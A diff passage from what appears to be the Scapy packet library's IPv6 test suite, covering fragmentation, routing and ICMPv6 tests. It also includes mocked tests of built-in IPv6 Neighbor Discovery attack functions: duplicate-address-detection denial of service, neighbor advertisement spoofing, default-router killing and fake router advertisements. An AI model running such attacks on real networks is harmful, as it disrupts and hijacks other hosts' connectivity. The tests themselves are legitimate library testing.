-a=IPv6ExtHdrFragment(b';\x00\x00\x00\x00\x00\x00\x00') -a.nh == 59 and a.res1 == 0 and a.offset == 0 and a.res2 == 0 and a.m == 0 and a.id == 0 - -= IPv6ExtHdrFragment - Instantiation with specific values -a=IPv6ExtHdrFragment(b'\xff\xee\xff\xfb\x11\x11\x11\x11') -a.nh == 0xff and a.res1 == 0xee and a.offset==0x1fff and a.res2==1 and a.m == 1 and a.id == 0x11111111 - -= IPv6 - IPv6ExtHdrFragment hashret -a=IPv6()/IPv6ExtHdrFragment(b'\xff\xee\xff\xfb\x11\x11\x11\x11') -a.hashret() == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff' - - -############ -############ -+ Test fragment6 function - -= fragment6 - test against a long TCP packet with a 1280 MTU -l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) -len(l) == 33 and len(raw(l[-1])) == 644 - -= fragment6 - test against a long TCP packet with a 1280 MTU without fragment header -l=fragment6(IPv6()/TCP()/Raw(load="A"*40000), 1280) -len(l) == 33 and len(raw(l[-1])) == 644 - - -############ -############ -+ Test defragment6 function - -= defragment6 - test against a long TCP packet fragmented with a 1280 MTU -l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) -raw(defragment6(l)) == (b'`\x00\x00\x00\x9cT\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xe92\x00\x00' + b'A'*40000) - - -= defragment6 - test against packets with L2 header -l=defragment6(fragment6(Ether()/IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*2000), 1280)) -Ether in l - - -= defragment6 - test against a large TCP packet fragmented with a 1280 bytes MTU and missing fragments -l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) -del(l[2]) -del(l[4]) -del(l[12]) -del(l[18]) -raw(defragment6(l)) == (b'`\x00\x00\x00\x9cT\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xe92\x00\x00' + 2444*b'A' + 1232*b'X' + 2464*b'A' + 1232*b'X' + 9856*b'A' + 1232*b'X' + 7392*b'A' + 1232*b'X' + 12916*b'A') - - -= defragment6 - test against a TCP packet fragmented with a 800 bytes MTU and missing fragments -l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*4000), 800) -del(l[4]) -del(l[2]) -raw(defragment6(l)) == b'`\x00\x00\x00\x0f\xb4\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xb2\x0f\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - -= defragment6 - test the packet length -pkts = fragment6(IPv6()/IPv6ExtHdrFragment()/UDP(dport=42, sport=42)/Raw(load="A"*1500), 1280) -pkts = [IPv6(raw(p)) for p in pkts] -assert defragment6(pkts).plen == 1508 - - -############ -############ -+ Test Route6 class - -= Fake interfaces -IFACES._add_fake_iface("eth0") -IFACES._add_fake_iface("lo") -IFACES._add_fake_iface("scapy0") - -= Route6 - Route6 flushing -conf_iface = conf.iface -conf.iface = "eth0" -conf.route6.routes=[ -( '::1', 128, '::', 'lo', ['::1'], 1), -( 'fe80::20f:1fff:feca:4650', 128, '::', 'lo', ['::1'], 1)] -conf.route6.flush() -not conf.route6.routes - -= Route6 - Route6.route - -conf.route6.flush() -conf.route6.ipv6_ifaces = set(['lo', 'eth0']) -conf.route6.routes=[ -( '::1', 128, '::', 'lo', ['::1'], 1), -( 'fe80::20f:1fff:feca:4650', 128, '::', 'lo', ['::1'], 1), -( 'fe80::', 64, '::', 'eth0', ['fe80::20f:1fff:feca:4650'], 1), -('2001:db8:0:4444:20f:1fff:feca:4650', 128, '::', 'lo', ['::1'], 1), -( '2001:db8:0:4444::', 64, '::', 'eth0', ['2001:db8:0:4444:20f:1fff:feca:4650'], 1), -( '::', 0, 'fe80::20f:34ff:fe8a:8aa1', 'eth0', ['2001:db8:0:4444:20f:1fff:feca:4650', '2002:db8:0:4444:20f:1fff:feca:4650'], 1) -] -assert conf.route6.route("2002::1") == ('eth0', '2002:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') -assert conf.route6.route("2001::1") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') -assert conf.route6.route("fe80::20f:1fff:feab:4870") == ('eth0', 'fe80::20f:1fff:feca:4650', '::') -assert conf.route6.route("::1") == ('lo', '::1', '::') -assert conf.route6.route("::") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') -assert conf.route6.route('ff00::') == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') -conf.iface = conf_iface -conf.route6.resync() -if not len(conf.route6.routes): - # IPv6 seems disabled. Force a route to ::1 - conf.route6.routes.append(("::1", 128, "::", conf.loopback_name, ["::1"], 1)) - True - -= Route6 - Route6.make_route - -r6 = Route6() -r6.make_route("2001:db8::1", dev=conf.loopback_name) in [ - ("2001:db8::1", 128, "::", conf.loopback_name, [], 1), - ("2001:db8::1", 128, "::", conf.loopback_name, ["::1"], 1) -] -len_r6 = len(r6.routes) - -= Route6 - Route6.add & Route6.delt - -r6.add(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1", dev="eth0") -assert(len(r6.routes) == len_r6 + 1) -r6.delt(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1") -assert(len(r6.routes) == len_r6) - -= Route6 - Route6.ifadd & Route6.ifdel -r6.ifadd("scapy0", "2001:bd8:cafe:1::1/64") -r6.ifdel("scapy0") - -= IPv6 - utils - -@mock.patch("scapy.layers.inet6.get_if_hwaddr") -@mock.patch("scapy.layers.inet6.srp1") -def test_neighsol(mock_srp1, mock_get_if_hwaddr): - mock_srp1.return_value = Ether()/IPv6()/ICMPv6ND_NA()/ICMPv6NDOptDstLLAddr(lladdr="05:04:03:02:01:00") - mock_get_if_hwaddr.return_value = "00:01:02:03:04:05" - return neighsol("fe80::f6ce:46ff:fea9:e04b", "fe80::f6ce:46ff:fea9:e04b", "scapy0") - -p = test_neighsol() -ICMPv6NDOptDstLLAddr in p and p[ICMPv6NDOptDstLLAddr].lladdr == "05:04:03:02:01:00" - - -@mock.patch("scapy.layers.inet6.neighsol") -@mock.patch("scapy.layers.inet6.conf.route6.route") -def test_getmacbyip6(mock_route6, mock_neighsol): - mock_route6.return_value = ("scapy0", "fe80::baca:3aff:fe72:b08b", "::") - mock_neighsol.return_value = test_neighsol() - return getmacbyip6("fe80::704:3ff:fe2:100") - -test_getmacbyip6() == "05:04:03:02:01:00" - -= IPv6 - IPerror6 & UDPerror & _ICMPv6Error - -query = IPv6(dst="2001:db8::1", src="2001:db8::2", hlim=1)/UDP()/DNS() -answer = IPv6(dst="2001:db8::2", src="2001:db8::1", hlim=1)/ICMPv6TimeExceeded()/IPerror6(dst="2001:db8::1", src="2001:db8::2", hlim=0)/UDPerror()/DNS() -answer.answers(query) == True - -# Test _ICMPv6Error -from scapy.layers.inet6 import _ICMPv6Error -assert _ICMPv6Error().guess_payload_class(None) == IPerror6 -assert _ICMPv6Error().hashret() == b'' - -= Windows: reset routes properly - -if WINDOWS: - from scapy.arch.windows import _route_add_loopback - _route_add_loopback() - -############ -############ -+ ICMPv6ML - -= ICMPv6MLQuery - build & dissection -s = raw(IPv6(src="fe80::1")/ICMPv6MLQuery()) -assert s == b"`\x00\x00\x00\x00\x18:\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x82\x00Y\x17'\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - -p = IPv6(s) -assert ICMPv6MLQuery in p and p[IPv6].dst == "ff02::1" - -= Check answers - -q = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLQuery() -a = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLReport() - -assert a.answers(q) - -############ -############ -+ ICMPv6MLv2 - -= ICMPv6MLQuery2 - build & dissection -p = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLQuery2(sources=["::1"]) -s = raw(p) -assert s == b"`\x00\x00\x00\x004\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x00\x05\x02\x00\x00\x01\x00\x82\x00V\x85'\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" - -p = IPv6(s) -assert ICMPv6MLQuery2 in p and p.sources_number == 1 - -= ICMPv6MLReport2 - build & dissection -p = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLReport2(records=[ICMPv6MLDMultAddrRec(), ICMPv6MLDMultAddrRec(sources=["::1"], auxdata="scapy")]) -s = raw(p) -assert s == b'`\x00\x00\x00\x00M\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x00\x05\x02\x00\x00\x01\x00\x8f\x00\x1a\xa1\x00\x00\x00\x02\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01scapy' - -p = IPv6(s) -assert ICMPv6MLReport2 in p and p.records_number == 2 - -= ICMPv6MLReport2 and ICMPv6MLDMultAddrRec - dissection - -z = b'33\x00\x00\x00\x16\xd0P\x99V\xdd\xf9\x86\xdd`\x00\x00\x00\x00\x1c:\x01\xfe\x80\x00\x00\x00\x00\x00\x00q eX\x98\x86\xfa\x88\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x8f\x00\x13\x4d\x00\x00\x00\x01\x04\x00\x00\x00\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xffR\xf3\xe1' -w = Ether(z) - -assert len(w.records) == 1 -assert isinstance(w.records[0], ICMPv6MLDMultAddrRec) -assert w.records[0].dst == "ff02::1:ff52:f3e1" - -= Check answers - -q = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLQuery2() -a = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLReport2() - -assert a.answers(q) ############ ############ @@ -3838,933 +1903,6 @@ p = Ether()/IPv6(dst="www.google.com")/TCP() assert p.dst != p[IPv6].dst p.show() -############ -############ -+ TracerouteResult6 - -= get_trace() -ip6_hlim = [("2001:db8::%d" % i, i) for i in six.moves.range(1, 12)] - -tr6_packets = [ (IPv6(dst="2001:db8::1", src="2001:db8::254", hlim=hlim)/UDP()/"scapy", - IPv6(dst="2001:db8::254", src=ip)/ICMPv6TimeExceeded()/IPerror6(dst="2001:db8::1", src="2001:db8::254", hlim=0)/UDPerror()/"scapy") - for (ip, hlim) in ip6_hlim ] - -tr6 = TracerouteResult6(tr6_packets) -tr6.get_trace() == {'2001:db8::1': {1: ('2001:db8::1', False), 2: ('2001:db8::2', False), 3: ('2001:db8::3', False), 4: ('2001:db8::4', False), 5: ('2001:db8::5', False), 6: ('2001:db8::6', False), 7: ('2001:db8::7', False), 8: ('2001:db8::8', False), 9: ('2001:db8::9', False), 10: ('2001:db8::10', False), 11: ('2001:db8::11', False)}} - -= show() -def test_show(): - with ContextManagerCaptureOutput() as cmco: - tr6 = TracerouteResult6(tr6_packets) - tr6.show() - result = cmco.get_output() - expected = " 2001:db8::1 :udpdomain \n" - expected += "1 2001:db8::1 3 \n" - expected += "2 2001:db8::2 3 \n" - expected += "3 2001:db8::3 3 \n" - expected += "4 2001:db8::4 3 \n" - expected += "5 2001:db8::5 3 \n" - expected += "6 2001:db8::6 3 \n" - expected += "7 2001:db8::7 3 \n" - expected += "8 2001:db8::8 3 \n" - expected += "9 2001:db8::9 3 \n" - expected += "10 2001:db8::10 3 \n" - expected += "11 2001:db8::11 3 \n" - index_result = result.index("\n1") - index_expected = expected.index("\n1") - assert(result[index_result:] == expected[index_expected:]) - -test_show() - -= graph() -saved_AS_resolver = conf.AS_resolver -conf.AS_resolver = None -tr6.make_graph() -assert len(tr6.graphdef) == 530 -assert tr6.graphdef.startswith("digraph trace {") -'"2001:db8::1 53/udp";' in tr6.graphdef -conf.AS_resolver = saved_AS_resolver - -############ -############ -+ IPv6 attacks - -= Define test utilities - -import mock - -@mock.patch("scapy.layers.inet6.sniff") -@mock.patch("scapy.layers.inet6.sendp") -def test_attack(function, pktlist, sendp_mock, sniff_mock, options=()): - pktlist = [Ether(raw(x)) for x in pktlist] - ret_list = [] - def _fake_sniff(lfilter=None, prn=None, **kwargs): - for p in pktlist: - if lfilter and lfilter(p) and prn: - prn(p) - sniff_mock.side_effect = _fake_sniff - def _fake_sendp(pkt, *args, **kwargs): - ret_list.append(Ether(raw(pkt))) - sendp_mock.side_effect = _fake_sendp - function(*options) - return ret_list - -= Test NDP_Attack_DAD_DoS_via_NS - -data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:00:11:11')/IPv6(src="::", dst="ff02::1:ff00:1111")/ICMPv6ND_NS(tgt="ffff::1111", code=17, res=3758096385), - Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:5d:c3:53')/IPv6(src="::", dst="ff02::1:ff5d:c353")/ICMPv6ND_NS(tgt="b643:44c3:f659:f8e6:31c0:6437:825d:c353"), - Ether()/IP()/ICMP()] -results = test_attack(NDP_Attack_DAD_DoS_via_NS, data) -assert len(results) == 2 - -a = results[0][IPv6] -assert a[IPv6].src == "::" -assert a[IPv6].dst == "ff02::1:ff00:1111" -assert a[IPv6].hlim == 255 -assert a[ICMPv6ND_NS].tgt == "ffff::1111" - -b = results[1][IPv6] -assert b[IPv6].src == "::" -assert b[IPv6].dst == "ff02::1:ff5d:c353" -assert b[IPv6].hlim == 255 -assert b[ICMPv6ND_NS].tgt == "b643:44c3:f659:f8e6:31c0:6437:825d:c353" - -= Test NDP_Attack_DAD_DoS_via_NA - -data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:00:11:11')/IPv6(src="::", dst="ff02::1:ff00:1111")/ICMPv6ND_NS(tgt="ffff::1111", code=17, res=3758096385), - Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:5d:c3:53')/IPv6(src="::", dst="ff02::1:ff5d:c353")/ICMPv6ND_NS(tgt="b643:44c3:f659:f8e6:31c0:6437:825d:c353"), - Ether()/IP()/ICMP()] -results = test_attack(NDP_Attack_DAD_DoS_via_NA, data, options=(None, None, None, "ab:ab:ab:ab:ab:ab")) -assert len(results) == 2 -results[0].dst = "ff:ff:ff:ff:ff:ff" -results[1].dst = "ff:ff:ff:ff:ff:ff" - -a = results[0] -assert a[Ether].dst == "ff:ff:ff:ff:ff:ff" -assert a[Ether].src == "ab:ab:ab:ab:ab:ab" -assert a[IPv6].src == "ffff::1111" -assert a[IPv6].dst == "ff02::1:ff00:1111" -assert a[IPv6].hlim == 255 -assert a[ICMPv6ND_NA].tgt == "ffff::1111" -assert a[ICMPv6NDOptDstLLAddr].lladdr == "ab:ab:ab:ab:ab:ab" - -b = results[1] -assert b[Ether].dst == "ff:ff:ff:ff:ff:ff" -assert b[Ether].src == "ab:ab:ab:ab:ab:ab" -assert b[IPv6].src == "b643:44c3:f659:f8e6:31c0:6437:825d:c353" -assert b[IPv6].dst == "ff02::1:ff5d:c353" -assert b[IPv6].hlim == 255 -assert b[ICMPv6ND_NA].tgt == "b643:44c3:f659:f8e6:31c0:6437:825d:c353" -assert b[ICMPv6NDOptDstLLAddr].lladdr == "ab:ab:ab:ab:ab:ab" - -= Test NDP_Attack_NA_Spoofing - -data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:d4:e5:f6')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="ff02::1:ffd4:e5f6")/ICMPv6ND_NS(tgt="ff02::1:ffd4:e5f6", code=171, res=3758096), - Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:e4:68:c9:4f')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="fe9c:98b0:52b5:7033:5db0:394f:e468:c94f")/ICMPv6ND_NS(), - Ether()/IP()/ICMP()] -results = test_attack(NDP_Attack_NA_Spoofing, data, options=(None, None, None, "ff:ff:ff:ff:ff:ff", None)) -assert len(results) == 2 - -a = results[0] -assert a[Ether].dst == "aa:aa:aa:aa:aa:aa" -assert a[Ether].src == "ff:ff:ff:ff:ff:ff" -assert a[IPv6].src == "ff02::1:ffd4:e5f6" -assert a[IPv6].dst == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" -assert a[IPv6].hlim == 255 -assert a[ICMPv6ND_NA].R == 0 -assert a[ICMPv6ND_NA].S == 1 -assert a[ICMPv6ND_NA].O == 1 -assert a[ICMPv6ND_NA].tgt == "ff02::1:ffd4:e5f6" -assert a[ICMPv6NDOptDstLLAddr].lladdr == "ff:ff:ff:ff:ff:ff" - -b = results[1] -assert b[Ether].dst == "aa:aa:aa:aa:aa:aa" -assert b[Ether].src == "ff:ff:ff:ff:ff:ff" -assert b[IPv6].src == "::" -assert b[IPv6].dst == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" -assert b[IPv6].hlim == 255 -assert b[ICMPv6ND_NA].R == 0 -assert b[ICMPv6ND_NA].S == 1 -assert b[ICMPv6ND_NA].O == 1 -assert b[ICMPv6ND_NA].tgt == "::" -assert b[ICMPv6NDOptDstLLAddr].lladdr == "ff:ff:ff:ff:ff:ff" - -= Test NDP_Attack_Kill_Default_Router - -data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:d4:e5:f6')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="ff02::1:ffd4:e5f6")/ICMPv6ND_RA(routerlifetime=1), - Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ab:52:e1:10')/IPv6(src="fe9c:98b0:52b5:7033:5db0:394f:e468:c94f", dst="753a:727c:97b5:f71d:51ea:3901:ab52:e110")/ICMPv6ND_RA(routerlifetime=1), - Ether()/IP()/"RANDOM"] -results = test_attack(NDP_Attack_Kill_Default_Router, data) -assert len(results) == 2 - -a = results[0][IPv6] -assert a[IPv6].src == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" -assert a[IPv6].dst == "ff02::1" -assert a[IPv6].hlim == 255 -assert a[ICMPv6ND_RA].M == 0 -assert a[ICMPv6ND_RA].O == 0 -assert a[ICMPv6ND_RA].H == 0 -assert a[ICMPv6ND_RA].P == 0 -assert a[ICMPv6ND_RA].routerlifetime == 0 -assert a[ICMPv6ND_RA].reachabletime == 0 -assert a[ICMPv6ND_RA].retranstimer == 0 -assert a[ICMPv6NDOptSrcLLAddr].lladdr == "aa:aa:aa:aa:aa:aa" - -b = results[1][IPv6] -assert b[IPv6].src == "fe9c:98b0:52b5:7033:5db0:394f:e468:c94f" -assert b[IPv6].dst == "ff02::1" -assert b[IPv6].hlim == 255 -assert b[ICMPv6ND_RA].M == 0 -assert b[ICMPv6ND_RA].O == 0 -assert b[ICMPv6ND_RA].H == 0 -assert b[ICMPv6ND_RA].P == 0 -assert b[ICMPv6ND_RA].routerlifetime == 0 -assert b[ICMPv6ND_RA].reachabletime == 0 -assert b[ICMPv6ND_RA].retranstimer == 0 -assert b[ICMPv6NDOptSrcLLAddr].lladdr == "aa:aa:aa:aa:aa:aa" - -= Test NDP_Attack_Fake_Router - -ra = Ether()/IPv6()/ICMPv6ND_RA() -ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) -ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) -ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") - -rad = Ether(raw(ra)) - -data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ab:52:e1:10')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="ff02::1:ffd4:e5f6")/ICMPv6ND_RS(code=11, res=3758096), - Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ab:52:e1:10')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="fe9c:98b0:52b5:7033:5db0:394f:e468:c94f")/ICMPv6ND_RS(), - Ether()/IP()/ICMP()] -results = test_attack(NDP_Attack_Fake_Router, data, options=(ra,)) -assert len(results) == 2 - -assert results[0] == rad -assert results[1] == rad - -= Test 